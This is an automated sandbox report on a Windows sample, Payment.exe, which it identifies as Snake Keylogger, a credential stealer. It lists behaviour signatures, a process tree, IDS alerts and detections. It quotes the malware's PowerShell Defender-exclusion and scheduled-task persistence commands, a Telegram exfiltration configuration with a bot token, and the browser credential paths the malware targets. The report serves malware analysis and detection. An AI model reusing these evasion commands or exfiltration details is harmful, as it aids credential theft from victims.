Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment.exe

Overview

General Information

Sample name:Payment.exe
Analysis ID:1662149
MD5:d901ba37a7c16410f6307bd095943464
SHA1:8173dbc5eda6f8828e46c3ca961a966e90677549
SHA256:f2392e04e5ffb9bcee95ce763a7686322a9abd7210af28ef3f653402515a6013
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking volume information)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment.exe (PID: 3532 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: D901BA37A7C16410F6307BD095943464)
    • powershell.exe (PID: 1264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7764 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1972 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: D901BA37A7C16410F6307BD095943464)
    • vds.exe (PID: 1972 cmdline: C:\Windows\System32\vds.exe MD5: C42169A3F10B54E8CC842D02D0C984CE)
  • armsvc.exe (PID: 7316 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: F5BCBACCEA71830B4ADA5AACE7DD6009)
  • alg.exe (PID: 7352 cmdline: C:\Windows\System32\alg.exe MD5: F5F9F809D3FB18C48C3370D67E8F57F0)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7404 cmdline: C:\Windows\system32\AppVClient.exe MD5: D02ADE3690351E51274F8DAB3EF8527B)
  • FXSSVC.exe (PID: 7496 cmdline: C:\Windows\system32\fxssvc.exe MD5: 641F60CC8AA8AE371354EF47EF1E9B50)
  • elevation_service.exe (PID: 7588 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: C62328C824D1142307E89E24A97CCB4F)
  • jwBqGZseW.exe (PID: 7616 cmdline: C:\Users\user\AppData\Roaming\jwBqGZseW.exe MD5: D901BA37A7C16410F6307BD095943464)
    • schtasks.exe (PID: 7336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jwBqGZseW.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Roaming\jwBqGZseW.exe" MD5: D901BA37A7C16410F6307BD095943464)
  • maintenanceservice.exe (PID: 7644 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 9CB9A6DEF1322C7B613C658F9B032D53)
  • msdtc.exe (PID: 7676 cmdline: C:\Windows\System32\msdtc.exe MD5: 63CA6225D09DACD20B222A08A4B863DB)
  • PerceptionSimulationService.exe (PID: 7756 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 5028FF3766791F2B40040BD7FCC5FB38)
  • perfhost.exe (PID: 7856 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: D98A44031FF26B76D4FF4A6C3CF564FF)
  • Locator.exe (PID: 7896 cmdline: C:\Windows\system32\locator.exe MD5: CAC0C346600DADC3A2F9844B57034E37)
  • SensorDataService.exe (PID: 7940 cmdline: C:\Windows\System32\SensorDataService.exe MD5: CFADB5EC4017AD003BBB2B494F78B9B2)
  • snmptrap.exe (PID: 7976 cmdline: C:\Windows\System32\snmptrap.exe MD5: 0663B0F3EC10C5CD298AB00AE4A219E6)
  • Spectrum.exe (PID: 8012 cmdline: C:\Windows\system32\spectrum.exe MD5: F5FAE39097EBC6CF8E317DF792A8F652)
  • ssh-agent.exe (PID: 8068 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 4AC4E5CA0E55BB2A8A197339FAE080BE)
  • TieringEngineService.exe (PID: 8152 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: FD56E587DAEE784FCDE019B8B3A0AE0F)
  • AgentService.exe (PID: 2788 cmdline: C:\Windows\system32\AgentService.exe MD5: 9FBA24FB61189666E7B7AB809CF7EA57)
  • wbengine.exe (PID: 7544 cmdline: "C:\Windows\system32\wbengine.exe" MD5: E0CBE1D15877EC451B37D7A94F40D6D1)
  • svchost.exe (PID: 7952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat id": "7941708421"}
{"Exfil Mode": "Telegram", "Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat_id": "7941708421", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 29 entries
            SourceRuleDescriptionAuthorStrings
            8.2.Payment.exe.3c40000.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.Payment.exe.3c40000.3.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                8.2.Payment.exe.3c40000.3.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.Payment.exe.3c40000.3.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x363d8:$a1: get_encryptedPassword
                  • 0x363ac:$a2: get_encryptedUsername
                  • 0x36470:$a3: get_timePasswordChanged
                  • 0x36388:$a4: get_passwordField
                  • 0x363ee:$a5: set_encryptedPassword
                  • 0x361bb:$a7: get_logins
                  • 0x31a96:$a10: KeyLoggerEventArgs
                  • 0x31a65:$a11: KeyLoggerEventArgsEventHandler
                  • 0x3628f:$a13: _encryptedPassword
                  8.2.Payment.exe.3c40000.3.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x40169:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x3f80c:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x3fa69:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x40448:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 62 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", ProcessId: 1264, ProcessName: powershell.exe
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", ProcessId: 1264, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jwBqGZseW.exe, ParentImage: C:\Users\user\AppData\Roaming\jwBqGZseW.exe, ParentProcessId: 7616, ParentProcessName: jwBqGZseW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", ProcessId: 7336, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", ProcessId: 1972, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", ProcessId: 1264, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7952, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", ProcessId: 1972, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:51.630493+020020516491A Network Trojan was detected192.168.2.8532051.1.1.153UDP
                  2025-04-10T18:09:54.326604+020020516491A Network Trojan was detected192.168.2.8530231.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:50.208723+020020516481A Network Trojan was detected192.168.2.8538101.1.1.153UDP
                  2025-04-10T18:09:52.805027+020020516481A Network Trojan was detected192.168.2.8544231.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:48.067906+020020181411A Network Trojan was detected52.11.240.23980192.168.2.849683TCP
                  2025-04-10T18:09:50.308934+020020181411A Network Trojan was detected3.229.117.5780192.168.2.849691TCP
                  2025-04-10T18:09:57.422631+020020181411A Network Trojan was detected13.213.51.19680192.168.2.849709TCP
                  2025-04-10T18:11:18.916566+020020181411A Network Trojan was detected54.169.144.9780192.168.2.849758TCP
                  2025-04-10T18:11:25.438430+020020181411A Network Trojan was detected18.142.91.11180192.168.2.849769TCP
                  2025-04-10T18:11:26.910662+020020181411A Network Trojan was detected52.43.119.12080192.168.2.849774TCP
                  2025-04-10T18:11:27.098730+020020181411A Network Trojan was detected54.85.87.18480192.168.2.849776TCP
                  2025-04-10T18:11:28.052827+020020181411A Network Trojan was detected34.245.175.18780192.168.2.849779TCP
                  2025-04-10T18:11:29.234198+020020181411A Network Trojan was detected34.229.166.5080192.168.2.849782TCP
                  2025-04-10T18:11:33.233098+020020181411A Network Trojan was detected52.26.80.13380192.168.2.849787TCP
                  2025-04-10T18:11:46.857725+020020181411A Network Trojan was detected52.212.150.5480192.168.2.849821TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:48.067906+020020377711A Network Trojan was detected52.11.240.23980192.168.2.849683TCP
                  2025-04-10T18:09:50.308934+020020377711A Network Trojan was detected3.229.117.5780192.168.2.849691TCP
                  2025-04-10T18:09:57.422631+020020377711A Network Trojan was detected13.213.51.19680192.168.2.849709TCP
                  2025-04-10T18:11:18.916566+020020377711A Network Trojan was detected54.169.144.9780192.168.2.849758TCP
                  2025-04-10T18:11:25.438430+020020377711A Network Trojan was detected18.142.91.11180192.168.2.849769TCP
                  2025-04-10T18:11:26.910662+020020377711A Network Trojan was detected52.43.119.12080192.168.2.849774TCP
                  2025-04-10T18:11:27.098730+020020377711A Network Trojan was detected54.85.87.18480192.168.2.849776TCP
                  2025-04-10T18:11:28.052827+020020377711A Network Trojan was detected34.245.175.18780192.168.2.849779TCP
                  2025-04-10T18:11:29.234198+020020377711A Network Trojan was detected34.229.166.5080192.168.2.849782TCP
                  2025-04-10T18:11:33.233098+020020377711A Network Trojan was detected52.26.80.13380192.168.2.849787TCP
                  2025-04-10T18:11:46.857725+020020377711A Network Trojan was detected52.212.150.5480192.168.2.849821TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:49.468689+020028033053Unknown Traffic192.168.2.849686104.21.64.1443TCP
                  2025-04-10T18:09:51.637581+020028033053Unknown Traffic192.168.2.849695104.21.64.1443TCP
                  2025-04-10T18:09:52.655160+020028033053Unknown Traffic192.168.2.849700104.21.64.1443TCP
                  2025-04-10T18:09:53.785992+020028033053Unknown Traffic192.168.2.849705104.21.64.1443TCP
                  2025-04-10T18:09:54.876682+020028033053Unknown Traffic192.168.2.849708104.21.64.1443TCP
                  2025-04-10T18:09:56.092849+020028033053Unknown Traffic192.168.2.849711104.21.64.1443TCP
                  2025-04-10T18:09:57.149050+020028033053Unknown Traffic192.168.2.849716104.21.64.1443TCP
                  2025-04-10T18:09:58.254728+020028033053Unknown Traffic192.168.2.849720104.21.64.1443TCP
                  2025-04-10T18:10:27.576180+020028033053Unknown Traffic192.168.2.849743104.21.64.1443TCP
                  2025-04-10T18:10:29.748922+020028033053Unknown Traffic192.168.2.849748104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:47.858065+020028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                  2025-04-10T18:09:49.061166+020028032742Potentially Bad Traffic192.168.2.849682132.226.8.16980TCP
                  2025-04-10T18:09:51.248685+020028032742Potentially Bad Traffic192.168.2.849689132.226.8.16980TCP
                  2025-04-10T18:09:52.342438+020028032742Potentially Bad Traffic192.168.2.849698132.226.8.16980TCP
                  2025-04-10T18:09:53.451779+020028032742Potentially Bad Traffic192.168.2.849702132.226.8.16980TCP
                  2025-04-10T18:09:54.442949+020028032742Potentially Bad Traffic192.168.2.849707132.226.8.16980TCP
                  2025-04-10T18:09:55.748824+020028032742Potentially Bad Traffic192.168.2.849710132.226.8.16980TCP
                  2025-04-10T18:09:56.748688+020028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
                  2025-04-10T18:09:57.936310+020028032742Potentially Bad Traffic192.168.2.849717132.226.8.16980TCP
                  2025-04-10T18:09:59.248699+020028032742Potentially Bad Traffic192.168.2.849721132.226.8.16980TCP
                  2025-04-10T18:10:12.565909+020028032742Potentially Bad Traffic192.168.2.849729132.226.8.16980TCP
                  2025-04-10T18:10:18.098665+020028032742Potentially Bad Traffic192.168.2.849731132.226.8.16980TCP
                  2025-04-10T18:10:23.655014+020028032742Potentially Bad Traffic192.168.2.849735132.226.8.16980TCP
                  2025-04-10T18:10:26.248751+020028032742Potentially Bad Traffic192.168.2.849740132.226.8.16980TCP
                  2025-04-10T18:10:28.358229+020028032742Potentially Bad Traffic192.168.2.849745132.226.8.16980TCP
                  2025-04-10T18:10:29.358136+020028032742Potentially Bad Traffic192.168.2.849747132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:59.170255+020028609481Malware Command and Control Activity Detected192.168.2.849722149.154.167.220443TCP
                  2025-04-10T18:10:33.069144+020028609481Malware Command and Control Activity Detected192.168.2.849753149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:50.206941+020028508511Malware Command and Control Activity Detected192.168.2.8496913.229.117.5780TCP
                  2025-04-10T18:11:23.482140+020028508511Malware Command and Control Activity Detected192.168.2.84976554.169.144.9780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-04-10T18:09:59.170255+020018100071Potentially Bad Traffic192.168.2.849722149.154.167.220443TCP
                  2025-04-10T18:10:33.069144+020018100071Potentially Bad Traffic192.168.2.849753149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
